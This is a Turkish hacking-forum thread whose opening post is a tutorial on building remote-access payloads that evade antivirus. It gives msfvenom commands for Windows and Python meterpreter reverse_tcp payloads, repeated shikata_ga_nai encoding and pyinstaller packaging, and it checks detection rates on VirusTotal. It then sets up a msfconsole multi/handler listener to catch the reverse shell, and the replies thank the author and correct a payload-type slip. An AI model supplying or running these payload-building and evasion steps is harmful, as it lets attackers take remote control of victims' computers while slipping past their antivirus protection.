THT DUYURU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

chat
Seçenekler

Anti-Virüslere Yakalanmayan Payload Oluşturalım!//"P4RS

"P4RS - ait Kullanıcı Resmi (Avatar)
Purple Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
19
Mesajlar:
4.772
Konular:
534
Teşekkür (Etti):
1356
Teşekkür (Aldı):
2737
Ticaret:
(0) %
27-09-2019 20:25
#1
Anti-Virüslere Yakalanmayan Payload Oluşturalım!//"P4RS
Merhabalar TürkHackTeam ailesi, bugün sizlerle birlikte Msfvenom Encoding yöntemi ile Payload hazırlayacağız. Konu başlıklarına bakalım ardından konumuza geçelim.

Konu Başlıkları
• Msfvenom Nedir?
• Encoder Nedir?
• Msfvenom ile Encoding İşlemi
• Pyinstaller Nedir?



Msfvenom Nedir?

Msfvenom ile payload oluşturabilir ve bu payloadların anti-virüs programlarına yakalanmaması adına Encoding yöntemini kullanabiliriz. Eskiden msfpayload ve msfencode araçları vardı fakat Msfvenom aracı ikisinin de işini yapabiliyor ve daha hızlıdır.




Encoder Nedir?

Bir programın/yazılımın anti-virüs programlarına yakalanmaması adına yapılan kriptolama işlemine denir.






Msfvenom ile Encoding İşlemi

Öncelikle Msfvenom aracımızda ki parametrelere bakalım bunun için de
Kod:
msfvenom -l
diyelim.



Biz encoder özelliğini kullanacağız ve bu modüllere bir bakalım. Bunun için de
Kod:
msfvenom -l encoders
yazalım.





Burada modüllerin açıklamasını, isimlerini ve seviyelerini veriyor.

Ben x86/shikata_ga_nai encoderını kullanacağım. Encoding işlemleri genel de varsayılan olarak 1 kere yapılır. Ne kadar fazla yaparsanız anti-virüslere yakalanma ihtimali o kadar düşer fakat boyutu da o kadar artar. 4-5 idealdir. Ben 5 yapacağım. Payload'ı oluşturmak için
Kod:
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > Nereye_Kaydetmek_İsterseniz
yazalım ve Enter'a basalım.



Virüstotal'e atalım ve ne kadar etkili bakalım Eveeett baya etikili Encoder'lar anti-virüsler tarafından apaçık belli oluyor artık. Bunun için farklı bir yöntem ile yapacağız.




Burada pyinstaller kullanacağız. Bunun ne olduğuna değinelim.




Pyinstaller Nedir?

Pyinstaller, .py uzantılı yani python ile yazılmış bir scripti .exe olarak dönüştürmenizi sağlar. Bu sayede anti-virüslere yakalanma olasılığınız baya bir düşer. İsterseniz deneyelim.

Yine terminale gelerek
Kod:
msfvenom -p python/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 -f raw > Dosya_Yolu
yazalım.



Bunu Virüstotal'e atalım bakalım ne olacak.



Gördüğünüz gibi oranı gayet iyi bir şekilde düştü. Fakat bu da bariz bir şekilde virüslü olduğunu gösteriyor. Bunun için de pyinstaller'ı kullanacağız.

Terminali açarak
Kod:
sudo apt-get install pyinstaller
yazalım ve indirelim.



Şimdi msfvenom ile .py uzantılı bir payload hazırladık fakat Windows makinelerde direk çalışması için .exe olmasını isteriz. Bunun için de terimale
Kod:
pyinstaller --onefile python_dosyanız.py
yazalım.



Gördüğünüz gibi nereye kaydettiğini de gösterdi bizlere.



Peki bunu Virüstotal'e atarsak ne olur?





Gayet başarılı

Peki bunu attık da nasıl dinleyeceğiz veya nasıl işlem yapacağız derseniz bunun içinde msfconsole'a işimiz düşüyor. Terimanelde açalım
Kod:
msfconsole


Açtıktan sonra Payload'ı dinlemek için
Kod:
use exploit/multi/handler
yazalım ardından Payload'ı tanıtalım
Kod:
set PAYLOAD python/meterpreter/reverse_tcp
yazalım.
show options diyerek ayarlamıza bakalım. Burada sadece IP adresi eksik port numarası doğru bunu da ayarlamak için
Kod:
set LHOST IP_adresiniz
yazalım.



Ardından Payload'ımızı dinlemek için
Kod:
exploit
yazalım ve dinlemeye başlayalım.








Konum bu kadardı arkadaşlar, başka bir yazımda görüşmek üzere sağlıcakla...
---------------------



purple-team@turkhackteam.org

Konu "P4RS tarafından (04-10-2019 15:08 Saat 15:08 ) değiştirilmiştir.
ZVkill3r - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2019
Mesajlar:
31
Konular:
6
Teşekkür (Etti):
43
Teşekkür (Aldı):
3
Ticaret:
(0) %
27-09-2019 21:08
#2
Cevap: Anti-Virüslere Yakalanmayan Payload Oluşturalım!//"P4RS
Öncelikle böyle güzel bir konu için teşekkür ederim. Anlamadığım bir yer var.
Payload python a gore oluşturuldu. Ama windows payloadıymış gibi dinlemeye aldık. Pyinstaller sadece python dosyamizi windowsta calistirmak icin degil mi? Calisma mantigi nedir?
"P4RS Teşekkür etti.
"P4RS - ait Kullanıcı Resmi (Avatar)
Purple Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
19
Mesajlar:
4.772
Konular:
534
Teşekkür (Etti):
1356
Teşekkür (Aldı):
2737
Ticaret:
(0) %
27-09-2019 21:19
#3
Cevap: Anti-Virüslere Yakalanmayan Payload Oluşturalım!//"P4RS
Alıntı:
ZVkill3r´isimli üyeden Alıntı Mesajı göster
Öncelikle böyle güzel bir konu için teşekkür ederim. Anlamadığım bir yer var.
Payload python a gore oluşturuldu. Ama windows payloadıymış gibi dinlemeye aldık. Pyinstaller sadece python dosyamizi windowsta calistirmak icin degil mi? Calisma mantigi nedir?
Güzel yorumunuz için ve uyarınız için çok teşekkür ederim Doğru dediğiniz gibi dalgınlıkla windows olarak payload'ı ayarlamışım fakat dediğiniz gibi python olarak olması gerekiyordu. Konuda düzeltme yaptım ve uyarınız için tekrardan teşekkür ederim
---------------------



purple-team@turkhackteam.org

ZVkill3r Teşekkür etti.
ZVkill3r - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2019
Mesajlar:
31
Konular:
6
Teşekkür (Etti):
43
Teşekkür (Aldı):
3
Ticaret:
(0) %
27-09-2019 22:35
#4
Cevap: Anti-Virüslere Yakalanmayan Payload Oluşturalım!//"P4RS
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Güzel yorumunuz için ve uyarınız için çok teşekkür ederim Doğru dediğiniz gibi dalgınlıkla windows olarak payload'ı ayarlamışım fakat dediğiniz gibi python olarak olması gerekiyordu. Konuda düzeltme yaptım ve uyarınız için tekrardan teşekkür ederim
Rica ederim 😊. Senin sayende ayriyetten linuxdan linuxu hacklemeyi de öğrenmiş oldum. Windows için Python payloadinin boyle kullanilmasi da cok akıllıca. diğer konularını bekliyorum.
"P4RS - ait Kullanıcı Resmi (Avatar)
Purple Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
19
Mesajlar:
4.772
Konular:
534
Teşekkür (Etti):
1356
Teşekkür (Aldı):
2737
Ticaret:
(0) %
28-09-2019 08:07
#5
Cevap: Anti-Virüslere Yakalanmayan Payload Oluşturalım!//"P4RS
Alıntı:
ZVkill3r´isimli üyeden Alıntı Mesajı göster
Rica ederim 😊. Senin sayende ayriyetten linuxdan linuxu hacklemeyi de öğrenmiş oldum. Windows için Python payloadinin boyle kullanilmasi da cok akıllıca. diğer konularını bekliyorum.
Inşallah yenileri de gelecektir
---------------------



purple-team@turkhackteam.org


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler